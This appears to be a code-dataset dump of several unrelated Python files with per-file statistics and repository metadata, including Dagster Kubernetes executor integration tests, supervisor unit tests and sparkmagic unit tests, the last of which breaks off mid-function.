    u.append([1.0 if x in [10,11,12,15,17,20,21,22,25] else 0.0 for x in range(26)])
    # Train with several learning rates for comparison.
    for c in [1.0, 0.1, 0.01]:
        perceptron(u, c)
if __name__ == '__main__':
main()
"""
u1 = [0 0 0 0 0
0 1 1 0 0
0 0 1 0 0
0 0 1 0 0
0 0 1 0 0 1]
u2 = [0 0 1 1 0
0 0 0 1 0
0 0 0 1 0
0 0 0 0 0
0 0 0 0 0 1]
u3 = [0 0 0 0 0
1 1 0 0 0
0 1 0 0 0
0 1 0 0 0
0 1 0 0 0 1]
u4 = [0 0 0 0 0
0 1 1 1 0
0 1 0 1 0
0 1 1 1 0
0 0 0 0 0 1]
u5 = [0 0 0 0 0
0 0 0 0 0
1 1 1 0 0
1 0 1 0 0
1 1 1 0 0 1]
"""
| 19.156627
| 84
| 0.431447
| 374
| 1,590
| 1.81016
| 0.160428
| 0.230428
| 0.217134
| 0.200886
| 0.468242
| 0.45938
| 0.45938
| 0.451994
| 0.44904
| 0.422452
| 0
| 0.275751
| 0.413836
| 1,590
| 83
| 85
| 19.156627
| 0.450644
| 0
| 0
| 0.055556
| 0
| 0
| 0.029185
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.138889
| 0.083333
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
18ba3534e06462178884eaa99455cc5ef09320d9
| 168
|
py
|
Python
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 6
|
2015-02-19T19:22:10.000Z
|
2019-04-04T16:08:40.000Z
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 1
|
2017-02-12T07:02:05.000Z
|
2017-02-12T07:02:05.000Z
|
tracadvsearch/__init__.py
|
dnephin/TracAdvancedSearchPlugin
|
b48426bc3f0a843e822783224d316aaf4c3286b5
|
[
"ISC"
] | 3
|
2016-03-16T16:10:10.000Z
|
2020-12-07T21:50:49.000Z
|
from advsearch import SearchBackendException
from advsearch import AdvancedSearchPlugin
from backend import PySolrSearchBackEnd
from interface import IAdvSearchBackend
| 33.6
| 44
| 0.904762
| 16
| 168
| 9.5
| 0.5625
| 0.171053
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 168
| 4
| 45
| 42
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18e1d8174c771757f2928978ab5bbdf82b46fe2a
| 11,658
|
py
|
Python
|
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | 1
|
2021-07-03T09:05:58.000Z
|
2021-07-03T09:05:58.000Z
|
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/test_suites/k8s-integration-test-suite/test_executor.py
|
NicolasPA/dagster
|
948bfc7b5582230417465b5662bd9f907c0e51c9
|
[
"Apache-2.0"
] | null | null | null |
import datetime
import os
import time
import pytest
from dagster import check
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.core.storage.tags import DOCKER_IMAGE_TAG
from dagster.core.test_utils import create_run_for_test
from dagster.utils import load_yaml_from_path, merge_dicts
from dagster_k8s.client import DagsterKubernetesClient
from dagster_k8s.launcher import K8sRunLauncher
from dagster_k8s.test import wait_for_job_and_get_raw_logs
from dagster_k8s.utils import wait_for_job
from dagster_k8s_test_infra.helm import TEST_AWS_CONFIGMAP_NAME
from dagster_k8s_test_infra.integration_utils import image_pull_policy
from dagster_test.test_project import (
IS_BUILDKITE,
ReOriginatedExternalPipelineForTest,
get_test_project_docker_image,
get_test_project_environments_path,
get_test_project_location_and_external_pipeline,
)
@pytest.mark.integration
def test_k8s_run_launcher_default(
    dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
    """Launch a pipeline through the K8s executor with an explicit job_image
    and assert the run succeeds and records the docker image tag."""
    # sanity check that we have a K8sRunLauncher
    check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
    pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
        namespace=helm_namespace_for_k8s_run_launcher
    )
    # No celery workers should be deployed in this (non-celery) test suite.
    celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
    check.invariant(not celery_pod_names)
    run_config = merge_dicts(
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env.yaml")),
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
        {
            "execution": {
                "k8s": {
                    "config": {
                        "job_namespace": helm_namespace_for_k8s_run_launcher,
                        "job_image": dagster_docker_image,
                        "image_pull_policy": image_pull_policy(),
                        "env_config_maps": ["dagster-pipeline-env"]
                        + ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
                    }
                }
            },
        },
    )
    pipeline_name = "demo_k8s_executor_pipeline"
    tags = {"key": "value"}
    with get_test_project_location_and_external_pipeline(pipeline_name) as (
        location,
        external_pipeline,
    ):
        run = create_run_for_test(
            dagster_instance_for_k8s_run_launcher,
            pipeline_name=pipeline_name,
            run_config=run_config,
            tags=tags,
            mode="default",
            pipeline_snapshot=external_pipeline.pipeline_snapshot,
            execution_plan_snapshot=location.get_external_execution_plan(
                external_pipeline, run_config, "default", None, None
            ).execution_plan_snapshot,
        )
        dagster_instance_for_k8s_run_launcher.launch_run(
            run.run_id,
            ReOriginatedExternalPipelineForTest(external_pipeline),
        )
        result = wait_for_job_and_get_raw_logs(
            job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
        )
        assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
        updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
        assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
@pytest.mark.integration
def test_k8s_run_launcher_image_from_origin(
    dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
    """Same as test_k8s_run_launcher_default but without job_image in the
    executor config; the image comes from the pipeline origin instead."""
    # Like the previous test, but the executor doesn't supply an image - it's pulled
    # from the origin (see get_test_project_location_and_external_pipeline below) instead
    check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
    pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
        namespace=helm_namespace_for_k8s_run_launcher
    )
    celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
    check.invariant(not celery_pod_names)
    # Note: no "job_image" key here, unlike the default test above.
    run_config = merge_dicts(
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env.yaml")),
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
        {
            "execution": {
                "k8s": {
                    "config": {
                        "job_namespace": helm_namespace_for_k8s_run_launcher,
                        "image_pull_policy": image_pull_policy(),
                        "env_config_maps": ["dagster-pipeline-env"]
                        + ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
                    }
                }
            },
        },
    )
    pipeline_name = "demo_k8s_executor_pipeline"
    tags = {"key": "value"}
    with get_test_project_location_and_external_pipeline(pipeline_name, dagster_docker_image) as (
        location,
        external_pipeline,
    ):
        run = create_run_for_test(
            dagster_instance_for_k8s_run_launcher,
            pipeline_name=pipeline_name,
            run_config=run_config,
            tags=tags,
            mode="default",
            pipeline_snapshot=external_pipeline.pipeline_snapshot,
            execution_plan_snapshot=location.get_external_execution_plan(
                external_pipeline, run_config, "default", None, None
            ).execution_plan_snapshot,
        )
        dagster_instance_for_k8s_run_launcher.launch_run(
            run.run_id,
            ReOriginatedExternalPipelineForTest(
                external_pipeline, container_image=dagster_docker_image
            ),
        )
        result = wait_for_job_and_get_raw_logs(
            job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
        )
        assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
        updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
        assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
@pytest.mark.integration
def test_k8s_run_launcher_terminate(
    dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
    """Launch a slow pipeline, terminate it mid-run, and assert the run ends
    in CANCELED and cannot be terminated a second time."""
    pipeline_name = "slow_pipeline"
    tags = {"key": "value"}
    run_config = merge_dicts(
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
        {
            "execution": {
                "k8s": {
                    "config": {
                        "job_namespace": helm_namespace_for_k8s_run_launcher,
                        "job_image": dagster_docker_image,
                        "image_pull_policy": image_pull_policy(),
                        "env_config_maps": ["dagster-pipeline-env"]
                        + ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
                    }
                }
            },
        },
    )
    with get_test_project_location_and_external_pipeline(pipeline_name) as (
        location,
        external_pipeline,
    ):
        run = create_run_for_test(
            dagster_instance_for_k8s_run_launcher,
            pipeline_name=pipeline_name,
            run_config=run_config,
            tags=tags,
            mode="k8s",
            pipeline_snapshot=external_pipeline.pipeline_snapshot,
            execution_plan_snapshot=location.get_external_execution_plan(
                external_pipeline, run_config, "k8s", None, None
            ).execution_plan_snapshot,
        )
        dagster_instance_for_k8s_run_launcher.launch_run(
            run.run_id,
            ReOriginatedExternalPipelineForTest(external_pipeline),
        )
        wait_for_job(
            job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
        )
        # Poll (up to 30s) until the launcher reports the run as terminable.
        timeout = datetime.timedelta(0, 30)
        start_time = datetime.datetime.now()
        while datetime.datetime.now() < start_time + timeout:
            if dagster_instance_for_k8s_run_launcher.run_launcher.can_terminate(run_id=run.run_id):
                break
            time.sleep(5)
        assert dagster_instance_for_k8s_run_launcher.run_launcher.can_terminate(run_id=run.run_id)
        assert dagster_instance_for_k8s_run_launcher.run_launcher.terminate(run_id=run.run_id)
        # Poll (up to 30s) until the run status transitions to CANCELED.
        start_time = datetime.datetime.now()
        pipeline_run = None
        while datetime.datetime.now() < start_time + timeout:
            pipeline_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
            if pipeline_run.status == PipelineRunStatus.CANCELED:
                break
            time.sleep(5)
        # useful to have logs here, because the worker pods get deleted
        print( # pylint: disable=print-call
            dagster_instance_for_k8s_run_launcher.all_logs(run.run_id)
        )
        assert pipeline_run.status == PipelineRunStatus.CANCELED
        # Terminating an already-canceled run must report failure.
        assert not dagster_instance_for_k8s_run_launcher.run_launcher.terminate(run_id=run.run_id)
@pytest.mark.integration
def test_k8s_executor_resource_requirements(
    dagster_instance_for_k8s_run_launcher, helm_namespace_for_k8s_run_launcher, dagster_docker_image
):
    """Run resources_limit_pipeline through the K8s executor and assert it
    completes successfully with the configured image tag recorded."""
    # sanity check that we have a K8sRunLauncher
    check.inst(dagster_instance_for_k8s_run_launcher.run_launcher, K8sRunLauncher)
    pods = DagsterKubernetesClient.production_client().core_api.list_namespaced_pod(
        namespace=helm_namespace_for_k8s_run_launcher
    )
    celery_pod_names = [p.metadata.name for p in pods.items if "celery-workers" in p.metadata.name]
    check.invariant(not celery_pod_names)
    run_config = merge_dicts(
        load_yaml_from_path(os.path.join(get_test_project_environments_path(), "env_s3.yaml")),
        {
            "execution": {
                "k8s": {
                    "config": {
                        "job_namespace": helm_namespace_for_k8s_run_launcher,
                        "job_image": dagster_docker_image,
                        "image_pull_policy": image_pull_policy(),
                        "env_config_maps": ["dagster-pipeline-env"]
                        + ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
                    }
                }
            },
        },
    )
    pipeline_name = "resources_limit_pipeline"
    tags = {"key": "value"}
    with get_test_project_location_and_external_pipeline(pipeline_name) as (
        location,
        external_pipeline,
    ):
        run = create_run_for_test(
            dagster_instance_for_k8s_run_launcher,
            pipeline_name=pipeline_name,
            run_config=run_config,
            tags=tags,
            mode="k8s",
            pipeline_snapshot=external_pipeline.pipeline_snapshot,
            execution_plan_snapshot=location.get_external_execution_plan(
                external_pipeline, run_config, "k8s", None, None
            ).execution_plan_snapshot,
        )
        dagster_instance_for_k8s_run_launcher.launch_run(
            run.run_id,
            ReOriginatedExternalPipelineForTest(external_pipeline),
        )
        result = wait_for_job_and_get_raw_logs(
            job_name="dagster-run-%s" % run.run_id, namespace=helm_namespace_for_k8s_run_launcher
        )
        assert "PIPELINE_SUCCESS" in result, "no match, result: {}".format(result)
        updated_run = dagster_instance_for_k8s_run_launcher.get_run_by_id(run.run_id)
        assert updated_run.tags[DOCKER_IMAGE_TAG] == get_test_project_docker_image()
| 39.788396
| 100
| 0.669326
| 1,365
| 11,658
| 5.243223
| 0.111355
| 0.075311
| 0.082157
| 0.092637
| 0.859438
| 0.825765
| 0.816962
| 0.791114
| 0.785245
| 0.783569
| 0
| 0.008533
| 0.256133
| 11,658
| 292
| 101
| 39.924658
| 0.816767
| 0.028907
| 0
| 0.66129
| 0
| 0
| 0.069471
| 0.006717
| 0
| 0
| 0
| 0
| 0.040323
| 1
| 0.016129
| false
| 0
| 0.064516
| 0
| 0.080645
| 0.004032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
beeb57c30bb79f0670a888c4baecaff22aae0506
| 2,925
|
py
|
Python
|
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
src/eavatar.ava/tests/unit/test_supervisotr.py
|
eavatar/ava
|
4f09c5417b7187dd919b7edabb8c516d8efc0696
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import time
import unittest
import mock
from ava.shell.base import Supervisor
def server_process1():
    # Dummy server target handed to Supervisor in the tests below; the real
    # Process class is mocked out, so this body only matters as a callable.
    time.sleep(2)
class SupervisorTest(unittest.TestCase):
    """Unit tests for ava.shell.base.Supervisor with multiprocessing.Process
    patched, driving lifecycle and restart behavior via mocked exitcodes."""

    @mock.patch('ava.shell.base.multiprocessing.Process')
    def test_supervisor(self, mock_process_class):
        # Normal lifecycle: start_server spawns the process, stop_server
        # terminates it.
        mp = mock_process_class.return_value
        mp.exitcode = None
        supervisor = Supervisor(target=server_process1)
        self.assertFalse(supervisor.is_server_running())
        supervisor.start_server()
        self.assertTrue(mock_process_class.called)
        self.assertTrue(mp.start.called)
        self.assertTrue(supervisor.is_server_running())
        supervisor.stop_server()
        self.assertTrue(mp.terminate.called)
        self.assertFalse(supervisor.is_server_running())

    @mock.patch('ava.shell.base.multiprocessing.Process')
    def test_supervisor_with_server_abnormally_exit(self, mock_process_class):
        # Abnormal/restart-requested exits cause restarts until the retry
        # budget is exhausted, after which health_check() gives up.
        mp = mock_process_class.return_value
        mp.exitcode = None
        supervisor = Supervisor(target=server_process1)
        self.assertFalse(supervisor.is_server_running())
        supervisor.start_server()
        self.assertTrue(mock_process_class.called)
        self.assertTrue(mp.start.called)
        self.assertTrue(supervisor.is_server_running())
        # emulate server process exits abnormally.
        mp.exitcode = -1
        self.assertTrue(supervisor.health_check())
        self.assertEqual(mp.start.call_count, 2)
        # exitcode = 1 indicates that server requested to restart.
        mp.exitcode = 1
        self.assertTrue(supervisor.health_check())
        self.assertEqual(mp.start.call_count, 3)
        # in case that restarting too many times, supervisor should give up.
        for i in range(5):
            mp.exitcode = -1
            supervisor.health_check()
        self.assertFalse(supervisor.health_check())
        supervisor.stop_server()
        self.assertFalse(mp.terminate.called)
        self.assertFalse(supervisor.is_server_running())

    @mock.patch('ava.shell.base.multiprocessing.Process')
    def test_supervisor_with_server_normally_exit(self, mock_process_class):
        # A clean exit (exitcode 0) must not trigger a restart.
        mp = mock_process_class.return_value
        mp.exitcode = None
        supervisor = Supervisor(target=server_process1)
        self.assertFalse(supervisor.is_server_running())
        supervisor.start_server()
        self.assertTrue(mock_process_class.called)
        self.assertTrue(mp.start.called)
        self.assertTrue(supervisor.is_server_running())
        # emulate server process exits normally.
        mp.exitcode = 0
        self.assertFalse(supervisor.health_check())
        self.assertEqual(mp.start.call_count, 1)
        supervisor.stop_server()
        self.assertFalse(mp.terminate.called)
        self.assertFalse(supervisor.is_server_running())
| 32.865169
| 78
| 0.699145
| 335
| 2,925
| 5.883582
| 0.226866
| 0.085236
| 0.073059
| 0.114155
| 0.793506
| 0.762557
| 0.762557
| 0.762557
| 0.762557
| 0.736175
| 0
| 0.006477
| 0.208205
| 2,925
| 88
| 79
| 33.238636
| 0.84456
| 0.076923
| 0
| 0.683333
| 0
| 0
| 0.042316
| 0.042316
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.066667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
beeccdcaefeb59e31aba841d509e1e4bdc818b84
| 28
|
py
|
Python
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 7
|
2021-07-15T19:31:18.000Z
|
2022-03-01T06:58:43.000Z
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 2
|
2021-04-29T14:26:26.000Z
|
2021-11-24T20:50:42.000Z
|
nmrdata/parse/__init__.py
|
mdarrows/whitelab-nmrdata
|
4f92c42ae1aedd15483a34250f41ebd3fa1ab343
|
[
"MIT"
] | 2
|
2021-08-18T00:50:14.000Z
|
2022-03-10T09:42:59.000Z
|
from .main import clean_pdb
| 14
| 27
| 0.821429
| 5
| 28
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83023f810b61604e88158d722b5b3e5289b02654
| 11,728
|
py
|
Python
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | 1
|
2020-05-26T20:57:43.000Z
|
2020-05-26T20:57:43.000Z
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | 2
|
2020-12-08T04:51:29.000Z
|
2021-06-10T18:19:40.000Z
|
sparkmagic/sparkmagic/tests/test_sparkmagicsbase.py
|
viaduct-ai/sparkmagic
|
6acb0967d5d7d600c360fab4db1c28f074de4c71
|
[
"RSA-MD"
] | null | null | null |
# -*- coding: utf-8 -*-
import sparkmagic.utils.configuration as conf
from mock import MagicMock
from nose.tools import with_setup, assert_equals, assert_raises, raises
from sparkmagic.utils.configuration import get_livy_kind
from sparkmagic.utils.constants import LANGS_SUPPORTED, SESSION_KIND_PYSPARK, SESSION_KIND_SPARK, \
IDLE_SESSION_STATUS, BUSY_SESSION_STATUS, MIMETYPE_TEXT_PLAIN, EXPECTED_ERROR_MSG
from sparkmagic.magics.sparkmagicsbase import SparkMagicBase
from sparkmagic.livyclientlib.exceptions import DataFrameParseException, BadUserDataException, SparkStatementException
from sparkmagic.livyclientlib.sqlquery import SQLQuery
from sparkmagic.livyclientlib.sparkstorecommand import SparkStoreCommand
def _setup():
    # nose with_setup fixture: build a SparkMagicBase whose collaborators
    # (shell, controller, display) are all MagicMocks, and reset config.
    global magic, session, shell, ipython_display
    shell = MagicMock()
    shell.user_ns = {}
    magic = SparkMagicBase(None)
    magic.shell = shell
    session = MagicMock()
    magic.spark_controller = MagicMock()
    magic.ipython_display = MagicMock()
    conf.override_all({})


def _teardown():
    # No per-test cleanup required; _setup rebuilds everything.
    pass
def test_load_emits_event():
    # Constructing the magic should emit the library-loaded telemetry event.
    spark_events = MagicMock()
    SparkMagicBase(None, spark_events=spark_events)
    spark_events.emit_library_loaded_event.assert_called_once_with()


def test_get_livy_kind_covers_all_langs():
    # get_livy_kind must not raise for any supported language.
    for lang in LANGS_SUPPORTED:
        get_livy_kind(lang)
@with_setup(_setup, _teardown)
def test_sql_df_execution_without_output_var():
    # No output var: the result is returned but nothing is stored in the
    # shell user namespace.
    df = 0
    query = SQLQuery("")
    output_var = None
    magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
    res = magic.execute_sqlquery("", None, None, None, session, output_var, False, None)
    magic.spark_controller.run_sqlquery.assert_called_once_with(query, session)
    assert res == df
    assert_equals(list(shell.user_ns.keys()), [])


@with_setup(_setup, _teardown)
def test_sql_df_execution_with_output_var():
    # With an output var: the result is also bound into shell.user_ns.
    df = 0
    query = SQLQuery("")
    output_var = "var_name"
    magic.spark_controller = MagicMock()
    magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
    res = magic.execute_sqlquery("", None, None, None, session, output_var, False, None)
    magic.spark_controller.run_sqlquery.assert_called_once_with(query, session)
    assert res == df
    assert shell.user_ns[output_var] == df


@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_without_output_var():
    # quiet=True suppresses the returned result.
    df = 0
    cell = SQLQuery("")
    output_var = None
    magic.spark_controller = MagicMock()
    magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
    res = magic.execute_sqlquery("", None, None, None, session, output_var, True, None)
    magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
    assert res is None
    assert_equals(list(shell.user_ns.keys()), [])


@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_with_output_var():
    # quiet=True still stores the result under the output var.
    df = 0
    cell = SQLQuery("")
    output_var = "var_name"
    magic.spark_controller = MagicMock()
    magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
    res = magic.execute_sqlquery("", None, None, None, session, output_var, True, None)
    magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
    assert res is None
    assert shell.user_ns[output_var] == df


@with_setup(_setup, _teardown)
def test_sql_df_execution_quiet_with_coerce():
    # The coerce flag is forwarded into the SQLQuery comparison object.
    df = 0
    cell = SQLQuery("", coerce=True)
    output_var = "var_name"
    magic.spark_controller = MagicMock()
    magic.spark_controller.run_sqlquery = MagicMock(return_value=df)
    res = magic.execute_sqlquery("", None, None, None, session, output_var, True, True)
    magic.spark_controller.run_sqlquery.assert_called_once_with(cell, session)
    assert res is None
    assert shell.user_ns[output_var] == df
@with_setup(_setup, _teardown)
def test_print_endpoint_info():
    # Sessions are rendered (sorted by id) into a single HTML table.
    current_session_id = 1
    session1 = MagicMock()
    session1.id = 1
    session1.get_row_html.return_value = u"""<tr><td>row1</td></tr>"""
    session2 = MagicMock()
    session2.id = 3
    session2.get_row_html.return_value = u"""<tr><td>row2</td></tr>"""
    magic._print_endpoint_info([session2, session1], current_session_id)
    magic.ipython_display.html.assert_called_once_with(u"""<table>
<tr><th>ID</th><th>YARN Application ID</th><th>Kind</th><th>State</th><th>Spark UI</th><th>Driver log</th><th>User</th><th>Current session?</th></tr>\
<tr><td>row1</td></tr><tr><td>row2</td></tr>\
</table>""")


@with_setup(_setup, _teardown)
def test_print_empty_endpoint_info():
    # No sessions: a plain text message is displayed instead of a table.
    current_session_id = None
    magic._print_endpoint_info([], current_session_id)
    magic.ipython_display.html.assert_called_once_with(u'No active sessions.')
@with_setup(_setup, _teardown)
@raises(BadUserDataException)
def test_send_to_spark_should_raise_when_variable_value_is_none():
    # A None-valued input variable is rejected before anything is sent.
    input_variable_name = "x_in"
    output_variable_name = "x_out"
    var_type = "str"
    max_rows = 25000
    magic.shell.user_ns[input_variable_name] = None
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)


@with_setup(_setup, _teardown)
@raises(BadUserDataException)
def test_send_to_spark_should_raise_when_type_is_incorrect():
    # Only recognized var_type values are accepted.
    input_variable_name = "x_in"
    input_variable_value = "x_value"
    output_variable_name = "x_out"
    var_type = "incorrect"
    max_rows = 25000
    magic.shell.user_ns[input_variable_name] = input_variable_value
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)


@with_setup(_setup, _teardown)
def test_send_to_spark_should_print_error_when_str_command_failed():
    # A failed remote command surfaces through send_error, not write.
    # var_type comparison appears case-insensitive ("STR") — see implementation.
    input_variable_name = "x_in"
    input_variable_value = "x_value"
    output_variable_name = "x_out"
    var_type = "STR"
    output_value = "error"
    max_rows = 25000
    magic.shell.user_ns[input_variable_name] = input_variable_value
    magic.spark_controller.run_command.return_value = (False, output_value, "text/plain")
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
    magic.ipython_display.send_error.assert_called_once_with(output_value)
    assert not magic.ipython_display.write.called


@with_setup(_setup, _teardown)
def test_send_to_spark_should_print_error_when_df_command_failed():
    # Same failure path for the dataframe variant.
    input_variable_name = "x_in"
    input_variable_value = "x_value"
    output_variable_name = "x_out"
    var_type = "df"
    output_value = "error"
    max_rows = 25000
    magic.shell.user_ns[input_variable_name] = input_variable_value
    magic.spark_controller.run_command.return_value = (False, output_value, "text/plain")
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
    magic.ipython_display.send_error.assert_called_once_with(output_value)
    assert not magic.ipython_display.write.called


@with_setup(_setup, _teardown)
def test_send_to_spark_should_name_the_output_variable_the_same_as_input_name_when_custom_name_not_provided():
    # When output_variable_name is None, the input name is reused remotely.
    input_variable_name = "x_in"
    input_variable_value = output_value = "x_value"
    var_type = "str"
    output_variable_name = None
    max_rows = 25000
    magic.shell.user_ns[input_variable_name] = input_variable_value
    magic.spark_controller.run_command.return_value = (True, output_value, "text/plain")
    expected_message = u'Successfully passed \'{}\' as \'{}\' to Spark kernel'.format(input_variable_name, input_variable_name)
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
    magic.ipython_display.write.assert_called_once_with(expected_message)
    assert not magic.ipython_display.send_error.called


@with_setup(_setup, _teardown)
def test_send_to_spark_should_write_successfully_when_everything_is_correct():
    # Happy path: success message written, no error sent.
    input_variable_name = "x_in"
    input_variable_value = output_value = "x_value"
    output_variable_name = "x_out"
    max_rows = 25000
    var_type = "str"
    magic.shell.user_ns[input_variable_name] = input_variable_value
    magic.spark_controller.run_command.return_value = (True, output_value, "text/plain")
    expected_message = u'Successfully passed \'{}\' as \'{}\' to Spark kernel'.format(input_variable_name, output_variable_name)
    magic.do_send_to_spark("", input_variable_name, var_type, output_variable_name, max_rows, None)
    magic.ipython_display.write.assert_called_once_with(expected_message)
    assert not magic.ipython_display.send_error.called
@with_setup(_setup, _teardown)
def test_spark_execution_without_output_var():
    # Without an output var, no store command runs; a failed statement
    # raises SparkStatementException.
    output_var = None
    magic.spark_controller.run_command.return_value = (True,'out',MIMETYPE_TEXT_PLAIN)
    magic.execute_spark("", output_var, None, None, None, session, None)
    magic.ipython_display.write.assert_called_once_with('out')
    assert not magic.spark_controller._spark_store_command.called
    magic.spark_controller.run_command.return_value = (False,'out',MIMETYPE_TEXT_PLAIN)
    assert_raises(SparkStatementException, magic.execute_spark,"", output_var, None, None, None, session, True)
    assert not magic.spark_controller._spark_store_command.called


@with_setup(_setup, _teardown)
def test_spark_execution_with_output_var():
    # run_command is consumed twice via side_effect: once for the statement,
    # once for fetching the stored dataframe.
    mockSparkCommand = MagicMock()
    magic._spark_store_command = MagicMock(return_value=mockSparkCommand)
    output_var = "var_name"
    df = 'df'
